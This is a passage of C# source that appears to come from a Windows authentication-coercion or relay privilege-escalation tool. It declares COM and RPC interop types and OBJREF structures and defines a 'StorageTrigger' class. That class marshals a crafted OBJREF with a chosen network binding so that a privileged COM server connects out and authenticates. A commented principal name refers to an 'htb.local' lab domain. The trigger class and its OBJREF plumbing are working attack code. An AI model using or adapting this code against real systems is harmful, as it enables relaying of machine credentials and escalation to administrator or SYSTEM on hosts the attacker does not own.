 133 |     IntPtr SecurityDescriptor);
 134 | 
 135 |         [DllImport("Rpcrt4.dll", EntryPoint = "RpcServerRegisterAuthInfo", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, SetLastError = true)]
 136 |         public static extern int RpcServerRegisterAuthInfo(String ServerPrincName, uint AuthnSvc, IntPtr GetKeyFn, IntPtr Arg);
 137 | 
 138 |         public static byte[] GetMarshalledObject(object o)
 139 |         {
 140 |             IMoniker mk;
 141 | 
 142 |             CreateObjrefMoniker(Marshal.GetIUnknownForObject(o), out mk);
 143 | 
 144 |             IBindCtx bc;
 145 | 
 146 |             CreateBindCtx(0, out bc);
 147 | 
 148 |             string name;
 149 | 
 150 |             mk.GetDisplayName(bc, null, out name);
 151 | 
 152 |             return Convert.FromBase64String(name.Substring(7).TrimEnd(':'));
 153 |         }
 154 | 
 155 |         [ComImport]
 156 |         [Guid("0000000d-0000-0000-C000-000000000046")]
 157 |         [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 158 |         public interface IEnumSTATSTG
 159 |         {
 160 |             // The user needs to allocate an STATSTG array whose size is celt.
 161 |             [PreserveSig]
 162 |             uint
 163 |             Next(uint celt, [MarshalAs(UnmanagedType.LPArray), Out] System.Runtime.InteropServices.ComTypes.STATSTG[] rgelt, out uint pceltFetched);
 164 | 
 165 |             void Skip(uint celt);
 166 | 
 167 |             void Reset();
 168 | 
 169 |             [return: MarshalAs(UnmanagedType.Interface)]
 170 |             IEnumSTATSTG Clone();
 171 |         }
 172 | 
 173 |         [ComVisible(false)]
 174 |         [ComImport, InterfaceType(ComInterfaceType.InterfaceIsIUnknown), Guid("0000000A-0000-0000-C000-000000000046")]
 175 |         public interface ILockBytes
 176 |         {
 177 |             //Note: These two by(reference 32-bit integers (ULONG) could be used as return values instead,
 178 |             //      but they are not tagged [retval] in the IDL, so for consitency's sake...
 179 |             void ReadAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbRead);
 180 | 
 181 |             void WriteAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbWritten);
 182 | 
 183 |             void Flush();
 184 | 
 185 |             void SetSize(long cb);
 186 | 
 187 |             void LockRegion(long libOffset, long cb, int dwLockType);
 188 | 
 189 |             void UnlockRegion(long libOffset, long cb, int dwLockType);
 190 | 
 191 |             void Stat(out System.Runtime.InteropServices.ComTypes.STATSTG[] pstatstg, int grfStatFlag);
 192 |         }
 193 | 
 194 |         [Guid("00000003-0000-0000-C000-000000000046")]
 195 |         [InterfaceType(1)]
 196 |         [ComConversionLoss]
 197 |         [ComImport]
 198 |         public interface IMarshal
 199 |         {
 200 |             void GetUnmarshalClass([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out Guid pCid);
 201 | 
 202 |             void GetMarshalSizeMax([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out uint pSize);
 203 | 
 204 |             void MarshalInterface([MarshalAs(28)][In] IStream pstm, [In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS);
 205 | 
 206 |             void UnmarshalInterface([MarshalAs(28)][In] IStream pstm, [In] ref Guid riid, out IntPtr ppv);
 207 | 
 208 |             void ReleaseMarshalData([MarshalAs(28)][In] IStream pstm);
 209 | 
 210 |             void DisconnectObject([In] uint dwReserved);
 211 |         }
 212 | 
 213 |         [InterfaceType(1)]
 214 |         [ComConversionLoss]
 215 |         [Guid("0000000B-0000-0000-C000-000000000046")]
 216 |         [ComImport]
 217 |         public interface IStorage
 218 |         {
 219 |             void CreateStream([MarshalAs(21)][In] string pwcsName, [In] uint grfMode, [In] uint reserved1, [In] uint reserved2, [MarshalAs(28)] out IStream ppstm);
 220 | 
 221 |             void OpenStream([MarshalAs(21)][In] string pwcsName, [In] IntPtr reserved1, [In] uint grfMode, [In] uint reserved2, [MarshalAs(28)] out IStream ppstm);
 222 | 
 223 |             void CreateStorage([MarshalAs(21)][In] string pwcsName, [In] uint grfMode, [In] uint reserved1, [In] uint reserved2, [MarshalAs(28)] out IStorage ppstg);
 224 | 
 225 |             void OpenStorage([MarshalAs(21)][In] string pwcsName, [MarshalAs(28)][In] IStorage pstgPriority, [In] uint grfMode, [In] IntPtr snbExclude, [In] uint reserved, [MarshalAs(28)] out IStorage ppstg);
 226 | 
 227 |             void CopyTo([In] uint ciidExclude, [MarshalAs(42, SizeParamIndex = 0)][In] Guid[] rgiidExclude, [In] IntPtr snbExclude, [MarshalAs(28)][In] IStorage pstgDest);
 228 | 
 229 |             void MoveElementTo([MarshalAs(21)][In] string pwcsName, [MarshalAs(28)][In] IStorage pstgDest, [MarshalAs(21)][In] string pwcsNewName, [In] uint grfFlags);
 230 | 
 231 |             void Commit([In] uint grfCommitFlags);
 232 | 
 233 |             void Revert();
 234 | 
 235 |             void EnumElements([In] uint reserved1, [In] IntPtr reserved2, [In] uint reserved3, [MarshalAs(28)] out IEnumSTATSTG ppEnum);
 236 | 
 237 |             void DestroyElement([MarshalAs(21)][In] string pwcsName);
 238 | 
 239 |             void RenameElement([MarshalAs(21)][In] string pwcsOldName, [MarshalAs(21)][In] string pwcsNewName);
 240 | 
 241 |             void SetElementTimes([MarshalAs(21)][In] string pwcsName, [MarshalAs(42)][In] System.Runtime.InteropServices.ComTypes.FILETIME[] pctime, [MarshalAs(42)][In] System.Runtime.InteropServices.ComTypes.FILETIME[] patime, [MarshalAs(42)][In] System.Runtime.InteropServices.ComTypes.FILETIME[] pmtime);
 242 | 
 243 |             void SetClass([In] ref Guid clsid);
 244 | 
 245 |             void SetStateBits([In] uint grfStateBits, [In] uint grfMask);
 246 | 
 247 |             void Stat([MarshalAs(42)][Out] System.Runtime.InteropServices.ComTypes.STATSTG[] pstatstg, [In] uint grfStatFlag);
 248 |         }
 249 | 
 250 |         [ComImport, Guid("0000000c-0000-0000-C000-000000000046"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 251 |         public interface IStream
 252 |         {
 253 |             void Read([Out, MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbRead);
 254 | 
 255 |             void Write([MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv, uint cb, out uint pcbWritten);
 256 | 
 257 |             void Seek(long dlibMove, uint dwOrigin, out long plibNewPosition);
 258 | 
 259 |             void SetSize(long libNewSize);
 260 | 
 261 |             void CopyTo(IStream pstm, long cb, out long pcbRead, out long pcbWritten);
 262 | 
 263 |             void Commit(uint grfCommitFlags);
 264 | 
 265 |             void Revert();
 266 | 
 267 |             void LockRegion(long libOffset, long cb, uint dwLockType);
 268 | 
 269 |             void UnlockRegion(long libOffset, long cb, uint dwLockType);
 270 | 
 271 |             void Stat(out System.Runtime.InteropServices.ComTypes.STATSTG pstatstg, uint grfStatFlag);
 272 | 
 273 |             void Clone(out IStream ppstm);
 274 |         }
 275 | 
 276 |         [Flags]
 277 |         public enum CLSCTX : uint
 278 |         {
 279 |             CLSCTX_INPROC_SERVER = 0x1,
 280 |             CLSCTX_INPROC_HANDLER = 0x2,
 281 |             CLSCTX_LOCAL_SERVER = 0x4,
 282 |             CLSCTX_INPROC_SERVER16 = 0x8,
 283 |             CLSCTX_REMOTE_SERVER = 0x10,
 284 |             CLSCTX_INPROC_HANDLER16 = 0x20,
 285 |             CLSCTX_RESERVED1 = 0x40,
 286 |             CLSCTX_RESERVED2 = 0x80,
 287 |             CLSCTX_RESERVED3 = 0x100,
 288 |             CLSCTX_RESERVED4 = 0x200,
 289 |             CLSCTX_NO_CODE_DOWNLOAD = 0x400,
 290 |             CLSCTX_RESERVED5 = 0x800,
 291 |             CLSCTX_NO_CUSTOM_MARSHAL = 0x1000,
 292 |             CLSCTX_ENABLE_CODE_DOWNLOAD = 0x2000,
 293 |             CLSCTX_NO_FAILURE_LOG = 0x4000,
 294 |             CLSCTX_DISABLE_AAA = 0x8000,
 295 |             CLSCTX_ENABLE_AAA = 0x10000,
 296 |             CLSCTX_FROM_DEFAULT_CONTEXT = 0x20000,
 297 |             CLSCTX_ACTIVATE_32_BIT_SERVER = 0x40000,
 298 |             CLSCTX_ACTIVATE_64_BIT_SERVER = 0x80000,
 299 |             CLSCTX_INPROC = CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
 300 |             CLSCTX_SERVER = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER,
 301 |             CLSCTX_ALL = CLSCTX_SERVER | CLSCTX_INPROC_HANDLER
 302 |         }
 303 | 
 304 |         [Flags]
 305 |         public enum STGM : int
 306 |         {
 307 |             DIRECT = 0x00000000,
 308 |             TRANSACTED = 0x00010000,
 309 |             SIMPLE = 0x08000000,
 310 |             READ = 0x00000000,
 311 |             WRITE = 0x00000001,
 312 |             READWRITE = 0x00000002,
 313 |             SHARE_DENY_NONE = 0x00000040,
 314 |             SHARE_DENY_READ = 0x00000030,
 315 |             SHARE_DENY_WRITE = 0x00000020,
 316 |             SHARE_EXCLUSIVE = 0x00000010,
 317 |             PRIORITY = 0x00040000,
 318 |             DELETEONRELEASE = 0x04000000,
 319 |             NOSCRATCH = 0x00100000,
 320 |             CREATE = 0x00001000,
 321 |             CONVERT = 0x00020000,
 322 |             FAILIFTHERE = 0x00000000,
 323 |             NOSNAPSHOT = 0x00200000,
 324 |             DIRECT_SWMR = 0x00400000,
 325 |         }
 326 | 
 327 |         public static IntPtr GuidToPointer(Guid g)
 328 |         {
 329 |             IntPtr ret = Marshal.AllocCoTaskMem(16);
 330 |             Marshal.Copy(g.ToByteArray(), 0, ret, 16);
 331 |             return ret;
 332 |         }
 333 | 
 334 |         public static Guid IID_IUnknown = new Guid("{00000000-0000-0000-C000-000000000046}");
 335 |         public static IntPtr IID_IUnknownPtr = GuidToPointer(IID_IUnknown);
 336 | 
 337 |         [StructLayout(LayoutKind.Sequential)]
 338 |         public struct MULTI_QI
 339 |         {
 340 |             public IntPtr pIID;
 341 | 
 342 |             [MarshalAs(UnmanagedType.Interface)]
 343 |             public object pItf;
 344 | 
 345 |             public int hr;
 346 |         }
 347 | 
 348 |         [StructLayout(LayoutKind.Sequential)]
 349 |         public class COSERVERINFO
 350 |         {
 351 |             public uint dwReserved1;
 352 | 
 353 |             [MarshalAs(UnmanagedType.LPWStr)]
 354 |             public string pwszName;
 355 | 
 356 |             public IntPtr pAuthInfo;
 357 |             public uint dwReserved2;
 358 |         }
 359 | 
 360 |         [Guid("0000033C-0000-0000-c000-000000000046")]
 361 |         [ComImport]
 362 |         public class StandardActivator
 363 |         {
 364 |         }
 365 | 
 366 |         internal enum RUNLEVEL : uint
 367 |         {
 368 |             RUNLEVEL_LUA = 0x0,
 369 |             RUNLEVEL_HIGHEST = 0x1,
 370 |             RUNLEVEL_ADMIN = 0x2,
 371 |             RUNLEVEL_MAX_NON_UIA = 0x3,
 372 |             RUNLEVEL_LUA_UIA = 0x10,
 373 |             RUNLEVEL_HIGHEST_UIA = 0x11,
 374 |             RUNLEVEL_ADMIN_UIA = 0x12,
 375 |             RUNLEVEL_MAX = 0x13,
 376 |             INVALID_LUA_RUNLEVEL = 0xFFFFFFFF,
 377 |         };
 378 | 
 379 |         internal enum PRT
 380 |         {
 381 |             PRT_IGNORE = 0x0,
 382 |             PRT_CREATE_NEW = 0x1,
 383 |             PRT_USE_THIS = 0x2,
 384 |             PRT_USE_THIS_ONLY = 0x3,
 385 |         };
 386 | 
 387 |         [Guid("000001B9-0000-0000-c000-000000000046")]
 388 |         [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 389 |         internal interface ISpecialSystemPropertiesActivator
 390 |         {
 391 |             void SetSessionId(int dwSessionId, int bUseConsole, int fRemoteThisSessionId);
 392 | 
 393 |             void GetSessionId(out int pdwSessionId, out int pbUseConsole);
 394 | 
 395 |             void GetSessionId2(out int pdwSessionId, out int pbUseConsole, out int pfRemoteThisSessionId);
 396 | 
 397 |             void SetClientImpersonating(int fClientImpersonating);
 398 | 
 399 |             void GetClientImpersonating(out int pfClientImpersonating);
 400 | 
 401 |             void SetPartitionId(ref Guid guidPartition);
 402 | 
 403 |             void GetPartitionId(out Guid pguidPartition);
 404 | 
 405 |             void SetProcessRequestType(PRT dwPRT);
 406 | 
 407 |             void GetProcessRequestType(out PRT pdwPRT);
 408 | 
 409 |             void SetOrigClsctx(int dwOrigClsctx);
 410 | 
 411 |             void GetOrigClsctx(out int pdwOrigClsctx);
 412 | 
 413 |             void GetDefaultAuthenticationLevel(out int pdwDefaultAuthnLvl);
 414 | 
 415 |             void SetDefaultAuthenticationLevel(int dwDefaultAuthnLvl);
 416 | 
 417 |             void GetLUARunLevel(out RUNLEVEL pdwLUARunLevel, out IntPtr phwnd);
 418 | 
 419 |             void SetLUARunLevel(RUNLEVEL dwLUARunLevel, IntPtr hwnd);
 420 |         }
 421 | 
 422 |         [Guid("000001B8-0000-0000-c000-000000000046")]
 423 |         [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 424 |         public interface IStandardActivator
 425 |         {
 426 |             void StandardGetClassObject(in Guid rclsid, CLSCTX dwContext, [In] COSERVERINFO pServerInfo, in Guid riid, [MarshalAs(UnmanagedType.IUnknown)] out object ppvClassObj);
 427 | 
 428 |             void StandardCreateInstance(in Guid Clsid, IntPtr punkOuter, CLSCTX dwClsCtx, [In] COSERVERINFO pServerInfo, int dwCount, [In, Out][MarshalAs(UnmanagedType.LPArray)] MULTI_QI[] pResults);
 429 | 
 430 |             void StandardGetInstanceFromFile([In] COSERVERINFO pServerInfo, in Guid pclsidOverride,
 431 |                 IntPtr punkOuter, CLSCTX dwClsCtx, int grfMode, [MarshalAs(UnmanagedType.LPWStr)] string pwszName, int dwCount, [In, Out][MarshalAs(UnmanagedType.LPArray)] MULTI_QI[] pResults);
 432 | 
 433 |             int StandardGetInstanceFromIStorage(
 434 |                 [In] COSERVERINFO pServerInfo,
 435 |                 in Guid pclsidOverride,
 436 |                 IntPtr punkOuter,
 437 |                 CLSCTX dwClsCtx,
 438 |                 IStorage pstg,
 439 |                 int dwCount,
 440 |                 [In, Out][MarshalAs(UnmanagedType.LPArray)] MULTI_QI[] pResults);
 441 | 
 442 |             int StandardGetInstanceFromIStoragee(
 443 |                 COSERVERINFO pServerInfo,
 444 |                 ref Guid pclsidOverride,
 445 |                 [MarshalAs(UnmanagedType.IUnknown)] object pUnkOuter,
 446 |                 CLSCTX dwClsCtx,
 447 |                 IStorage pstg,
 448 |                 int dwCount,
 449 |                 [In, Out][MarshalAs(UnmanagedType.LPArray)] MULTI_QI[] pResults);
 450 | 
 451 |             void Reset();
 452 |         }
 453 | 
 454 |         public enum TowerProtocol : ushort
 455 |         {
 456 |             EPM_PROTOCOL_DNET_NSP = 0x04,
 457 |             EPM_PROTOCOL_OSI_TP4 = 0x05,
 458 |             EPM_PROTOCOL_OSI_CLNS = 0x06,
 459 |             EPM_PROTOCOL_TCP = 0x07,
 460 |             EPM_PROTOCOL_UDP = 0x08,
 461 |             EPM_PROTOCOL_IP = 0x09,
 462 |             EPM_PROTOCOL_NCADG = 0x0a, /* Connectionless RPC */
 463 |             EPM_PROTOCOL_NCACN = 0x0b,
 464 |             EPM_PROTOCOL_NCALRPC = 0x0c, /* Local RPC */
 465 |             EPM_PROTOCOL_UUID = 0x0d,
 466 |             EPM_PROTOCOL_IPX = 0x0e,
 467 |             EPM_PROTOCOL_SMB = 0x0f,
 468 |             EPM_PROTOCOL_NAMED_PIPE = 0x10,
 469 |             EPM_PROTOCOL_NETBIOS = 0x11,
 470 |             EPM_PROTOCOL_NETBEUI = 0x12,
 471 |             EPM_PROTOCOL_SPX = 0x13,
 472 |             EPM_PROTOCOL_NB_IPX = 0x14, /* NetBIOS over IPX */
 473 |             EPM_PROTOCOL_DSP = 0x16, /* AppleTalk Data Stream Protocol */
 474 |             EPM_PROTOCOL_DDP = 0x17, /* AppleTalk Data Datagram Protocol */
 475 |             EPM_PROTOCOL_APPLETALK = 0x18, /* AppleTalk */
 476 |             EPM_PROTOCOL_VINES_SPP = 0x1a,
 477 |             EPM_PROTOCOL_VINES_IPC = 0x1b, /* Inter Process Communication */
 478 |             EPM_PROTOCOL_STREETTALK = 0x1c, /* Vines Streettalk */
 479 |             EPM_PROTOCOL_HTTP = 0x1f,
 480 |             EPM_PROTOCOL_UNIX_DS = 0x20, /* Unix domain socket */
 481 |             EPM_PROTOCOL_NULL = 0x21
 482 |         }
 483 | 
 484 |         [ComVisible(true)]
 485 |         public class StorageTrigger : IMarshal, IStorage
 486 |         {
 487 |             private IStorage storage;
 488 |             private string binding;
 489 |             private TowerProtocol towerProtocol;
 490 |             private object SobjRef;
 491 | 
 492 |             public StorageTrigger(IStorage storage, string binding, TowerProtocol towerProtocol, object SobjRef = null)
 493 |             {
 494 |                 this.storage = storage;
 495 |                 this.binding = binding;
 496 |                 this.towerProtocol = towerProtocol;
 497 |                 this.SobjRef = SobjRef;
 498 |             }
 499 | 
 500 |             public void DisconnectObject(uint dwReserved)
 501 |             {
 502 |             }
 503 | 
 504 |             public void GetMarshalSizeMax(ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS, out uint pSize)
 505 |             {
 506 |                 pSize = 1024;
 507 |             }
 508 | 
 509 |             public void GetUnmarshalClass(ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS, out Guid pCid)
 510 |             {
 511 |                 pCid = new Guid("00000306-0000-0000-c000-000000000046");
 512 |             }
 513 | 
 514 |             public void MarshalInterface(IStream pstm, ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS)
 515 |             {
 516 |                 //ObjRef objRef = new ObjRef(Ole32.IID_IUnknown,
 517 |                 //      new ObjRef.Standard(0x1000, 1, 0x0703d84a06ec96cc, 0x539d029cce31ac, new Guid("{042c939f-54cd-efd4-4bbd-1c3bae972145}"),
 518 |                 //        new ObjRef.DualStringArray(new ObjRef.StringBinding(towerProtocol, binding), new ObjRef.SecurityBinding(0xa, 0xffff, null))));
 519 |                 //
 520 |                 //
 521 |                 //byte[] data = new byte[] { };
 522 |                 //if (SobjRef == null)
 523 |                 //{
 524 |                 //    data = objRef.GetBytes();
 525 |                 //}
 526 |                 //else
 527 |                 //{
 528 |                 //    //objRef = new ObjRef(Ole32.IID_IUnknown,
 529 |                 //    //  new ObjRef.Standard((uint)((COMObjRefStandard)SobjRef).Flags, (uint)((COMObjRefStandard)SobjRef).PublicRefs, ((COMObjRefStandard)SobjRef).Oxid, ((COMObjRefStandard)SobjRef).Oid, ((COMObjRefStandard)SobjRef).Ipid,
 530 |                 //    //    new ObjRef.DualStringArray(new ObjRef.StringBinding(towerProtocol, binding), new ObjRef.SecurityBinding(0x0010, 0xffff, "LDAP/ADMINIS-UB1IMGM.htb.local"))));
 531 |                 //    //data = objRef.GetBytes();
 532 |                 //    data = ((COMObjRefStandard)SobjRef).ToArray();
 533 |                 //}
 534 |                 uint written;
 535 |                 var data = ((COMObjRefStandard)SobjRef).ToArray();
 536 |                 pstm.Write(data, (uint)data.Length, out written);
 537 |             }
 538 | 
 539 |             public void ReleaseMarshalData(IStream pstm)
 540 |             {
 541 |             }
 542 | 
 543 |             public void UnmarshalInterface(IStream pstm, ref Guid riid, out IntPtr ppv)
 544 |             {
 545 |                 ppv = IntPtr.Zero;
 546 |             }
 547 | 
 548 |             public void Commit(uint grfCommitFlags)
 549 |             {
 550 |                 storage.Commit(grfCommitFlags);
 551 |             }
 552 | 
 553 |             public void CopyTo(uint ciidExclude, Guid[] rgiidExclude, IntPtr snbExclude, IStorage pstgDest)
 554 |             {
 555 |                 storage.CopyTo(ciidExclude, rgiidExclude, snbExclude, pstgDest);
 556 |             }
 557 | 
 558 |             public void CreateStorage(string pwcsName, uint grfMode, uint reserved1, uint reserved2, out IStorage ppstg)
 559 |             {
 560 |                 storage.CreateStorage(pwcsName, grfMode, reserved1, reserved2, out ppstg);
 561 |             }
 562 | 
 563 |             public void CreateStream(string pwcsName, uint grfMode, uint reserved1, uint reserved2, out IStream ppstm)
 564 |             {
 565 |                 storage.CreateStream(pwcsName, grfMode, reserved1, reserved2, out ppstm);
 566 |             }
 567 | 
 568 |             public void DestroyElement(string pwcsName)
 569 |             {
 570 |                 storage.DestroyElement(pwcsName);
 571 |             }
 572 | 
 573 |             public void EnumElements(uint reserved1, IntPtr reserved2, uint reserved3, out IEnumSTATSTG ppEnum)
 574 |             {
 575 |                 storage.EnumElements(reserved1, reserved2, reserved3, out ppEnum);
 576 |             }
 577 | 
 578 |             public void MoveElementTo(string pwcsName, IStorage pstgDest, string pwcsNewName, uint grfFlags)
 579 |             {
 580 |                 storage.MoveElementTo(pwcsName, pstgDest, pwcsNewName, grfFlags);
 581 |             }
 582 | 
 583 |             public void OpenStorage(string pwcsName, IStorage pstgPriority, uint grfMode, IntPtr snbExclude, uint reserved, out IStorage ppstg)
 584 |             {
 585 |                 storage.OpenStorage(pwcsName, pstgPriority, grfMode, snbExclude, reserved, out ppstg);
 586 |             }
 587 | 
 588 |             public void OpenStream(string pwcsName, IntPtr reserved1, uint grfMode, uint reserved2, out IStream ppstm)
 589 |             {
 590 |                 storage.OpenStream(pwcsName, reserved1, grfMode, reserved2, out ppstm);
 591 |             }
 592 | 
 593 |             public void RenameElement(string pwcsOldName, string pwcsNewName)
 594 |             {
 595 |             }
 596 | 
 597 |             public void Revert()
 598 |             {
 599 |             }
 600 | 
 601 |             public void SetClass(ref Guid clsid)
 602 |             {
 603 |             }
 604 | 
 605 |             public void SetElementTimes(string pwcsName, System.Runtime.InteropServices.ComTypes.FILETIME[] pctime, System.Runtime.InteropServices.ComTypes.FILETIME[] patime, System.Runtime.InteropServices.ComTypes.FILETIME[] pmtime)
 606 |             {
 607 |             }
 608 | 
 609 |             public void SetStateBits(uint grfStateBits, uint grfMask)
 610 |             {
 611 |             }
 612 | 
 613 |             public void Stat(System.Runtime.InteropServices.ComTypes.STATSTG[] pstatstg, uint grfStatFlag)
 614 |             {
 615 |                 storage.Stat(pstatstg, grfStatFlag);
 616 |                 pstatstg[0].pwcsName = "hello.stg";
 617 |             }
 618 |         }
 619 | 
 620 |         [Flags]
 621 |         public enum COMObjrefFlags
 622 |         {
 623 |             None = 0,
 624 |             Standard = 1,
 625 |             Handler = 2,
 626 |             Custom = 4,
 627 |             Extended = 8,
 628 |         }
 629 | 
 630 |         public enum RpcAuthnService : short
 631 |         {
 632 |             None = 0,
 633 |             DCEPrivate = 1,
 634 |             DCEPublic = 2,
 635 |             DECPublic = 4,
 636 |             GSS_Negotiate = 9,
 637 |             WinNT = 10,
 638 |             GSS_SChannel = 14,
 639 |             GSS_Kerberos = 16,
 640 |             DPA = 17,
 641 |             MSN = 18,
 642 |             Digest = 21,
 643 |             Kernel = 20,
 644 |             NegoExtender = 30,
 645 |             PKU2U = 31,
 646 |             LiveSSP = 32,
 647 |             LiveXPSSP = 35,
 648 |             MSOnline = 82,
 649 |             MQ = 100,
 650 |             Default = -1,
 651 |         }
 652 | 
 653 |         // Note that most of these won't actually work.
 654 |         public enum RpcTowerId : short
 655 |         {
 656 |             None = 0,
 657 |             DNetNSP = 0x04, // ncacn_dnet_dsp
 658 |             Tcp = 0x07,     // ncacg_ip_tcp
 659 |             Udp = 0x08,     // ncacn_ip_udp
 660 |             NetbiosTcp = 0x09, // ncacn_nb_tcp
 661 |             Spx = 0x0C,         // ncacn_spx
 662 |             NetbiosIpx = 0xD,   // ncacn_np_ipx
 663 |             Ipx = 0x0E,         // ncacg_ipx
 664 |             NamedPipe = 0xF,    // ncacn_np
 665 |             LRPC = 0x10,        // ncalrpc
 666 |             NetBIOS = 0x13,     // ncacn_nb_nb
 667 |             AppleTalkDSP = 0x16,// ncacn_at_dsp
 668 |             AppleTalkDDP = 0x17,// ncacg_at_ddp
 669 |             BanyanVinesSPP = 0x1A, // ncacn_vns_spp
 670 |             MessageQueue = 0x1D,   // ncadg_mq
 671 |             Http = 0x1F,           // ncacn_http
 672 |             Container = 0x21,      // ncacn_hvsocket
 673 |             StringBinding = -1,
 674 |         }
 675 | 
 676 |         public class COMStringBinding
 677 |         {
 678 |             public RpcTowerId TowerId { get; set; }
 679 |             public string NetworkAddr { get; set; }
 680 | 
 681 |             public COMStringBinding() : this(0, string.Empty)
 682 |             {
 683 |             }
 684 | 
 685 |             public COMStringBinding(RpcTowerId tower_id, string network_addr)
 686 |             {
 687 |                 TowerId = tower_id;
 688 |                 NetworkAddr = network_addr;
 689 |             }
 690 | 
 691 |             internal COMStringBinding(BinaryReader reader, bool direct_string)
 692 |             {
 693 |                 if (direct_string)
 694 |                 {
 695 |                     try
 696 |                     {
 697 |                         TowerId = RpcTowerId.StringBinding;
 698 |                         NetworkAddr = reader.ReadZString();
 699 |                     }
 700 |                     catch (EndOfStreamException)
 701 |                     {
 702 |                         NetworkAddr = string.Empty;
 703 |                     }
 704 |                 }
 705 |                 else
 706 |                 {
 707 |                     TowerId = (RpcTowerId)reader.ReadInt16();
 708 |                     if (TowerId != RpcTowerId.None)
 709 |                     {
 710 |                         NetworkAddr = reader.ReadZString();
 711 |                     }
 712 |                     else
 713 |                     {
 714 |                         NetworkAddr = string.Empty;
 715 |                     }
 716 |                 }
 717 |             }
 718 | 
 719 |             public void ToWriter(BinaryWriter writer)
 720 |             {
 721 |                 writer.Write((short)TowerId);
 722 |                 if (TowerId != 0)
 723 |                 {
 724 |                     writer.WriteZString(NetworkAddr);
 725 |                 }
 726 |             }
 727 | 
 728 |             public override string ToString()
 729 |             {
 730 |                 return $"TowerId: {TowerId} - NetworkAddr: {NetworkAddr}";
 731 |             }
 732 | 
 733 |             internal COMStringBinding Clone()
 734 |             {
 735 |                 return (COMStringBinding)MemberwiseClone();
 736 |             }
 737 |         }
 738 | 
 739 |         public class COMSecurityBinding
 740 |         {
 741 |             public RpcAuthnService AuthnSvc { get; set; }
 742 |             public string PrincName { get; set; }
 743 | 
 744 |             public COMSecurityBinding() : this(0, string.Empty)
 745 |             {
 746 |             }
 747 | 
 748 |             public COMSecurityBinding(RpcAuthnService authn_svc, string princ_name)
 749 |             {
 750 |                 AuthnSvc = authn_svc;
 751 |                 PrincName = princ_name;
 752 |             }
 753 | 
 754 |             internal COMSecurityBinding(BinaryReader reader)
 755 |             {
 756 |                 AuthnSvc = (RpcAuthnService)reader.ReadInt16();
 757 |                 if (AuthnSvc != 0)
 758 |                 {
 759 |                     // Reserved
 760 |                     reader.ReadInt16();
 761 |                     PrincName = reader.ReadZString();
 762 |                 }
 763 |                 else
 764 |                 {
 765 |                     PrincName = string.Empty;
 766 |                 }
 767 |             }
 768 | 
 769 |             public void ToWriter(BinaryWriter writer)
 770 |             {
 771 |                 writer.Write((short)AuthnSvc);
 772 |                 if (AuthnSvc != 0)
 773 |                 {
 774 |                     writer.Write((ushort)0xFFFF);
 775 |                     writer.WriteZString(PrincName);
 776 |                 }
 777 |             }
 778 | 
 779 |             public override string ToString()
 780 |             {
 781 |                 return $"AuthnSvc: {AuthnSvc} - PrincName: {PrincName}";
 782 |             }
 783 | 
 784 |             internal COMSecurityBinding Clone()
 785 |             {
 786 |                 return (COMSecurityBinding)MemberwiseClone();
 787 |             }
 788 |         }
 789 | 
 790 |         internal class COMDualStringArray
 791 |         {
 792 |             public List<COMStringBinding> StringBindings { get; private set; }
 793 |             public List<COMSecurityBinding> SecurityBindings { get; private set; }
 794 | 
 795 |             public COMDualStringArray()
 796 |             {
 797 |                 StringBindings = new List<COMStringBinding>();
 798 |                 SecurityBindings = new List<COMSecurityBinding>();
 799 |             }
 800 | 
 801 |             private void ReadEntries(BinaryReader new_reader, int sec_offset, bool direct_string)
 802 |             {
 803 |                 COMStringBinding str = new COMStringBinding(new_reader, direct_string);
 804 |                 if (direct_string)
 805 |                 {
 806 |                     StringBindings.Add(str);
 807 |                 }
 808 |                 else
 809 |                 {
 810 |                     while (str.TowerId != 0)
 811 |                     {
 812 |                         StringBindings.Add(str);
 813 |                         str = new COMStringBinding(new_reader, direct_string);
 814 |                     }
 815 |                 }
 816 | 
 817 |                 new_reader.BaseStream.Position = sec_offset * 2;
 818 |                 COMSecurityBinding sec = new COMSecurityBinding(new_reader);
 819 |                 while (sec.AuthnSvc != 0)
 820 |                 {
 821 |                     SecurityBindings.Add(sec);
 822 |                     sec = new COMSecurityBinding(new_reader);
 823 |                 }
 824 |             }
 825 | 
 826 |             //public COMDualStringArray(IntPtr ptr, NtProcess process, bool direct_string) : this()
 827 |             //{
 828 |             //    int num_entries = process.ReadMemory<ushort>(ptr.ToInt64());
 829 |             //    int sec_offset = process.ReadMemory<ushort>(ptr.ToInt64() + 2);
 830 |             //    if (num_entries > 0)
 831 |             //    {
 832 |             //        MemoryStream stm = new MemoryStream(process.ReadMemory(ptr.ToInt64() + 4, num_entries * 2));
 833 |             //        ReadEntries(new BinaryReader(stm), sec_offset, direct_string);
 834 |             //    }
 835 |             //}
 836 | 
 837 |             internal COMDualStringArray(BinaryReader reader) : this()
 838 |             {
 839 |                 int num_entries = reader.ReadUInt16();
 840 |                 int sec_offset = reader.ReadUInt16();
 841 | 
 842 |                 if (num_entries > 0)
 843 |                 {
 844 |                     MemoryStream stm = new MemoryStream(reader.ReadAll(num_entries * 2));
 845 |                     BinaryReader new_reader = new BinaryReader(stm);
 846 |                     ReadEntries(new_reader, sec_offset, false);
 847 |                 }
 848 |             }
 849 | 
 850 |             public void ToWriter(BinaryWriter writer)
 851 |             {
 852 |                 MemoryStream stm = new MemoryStream();
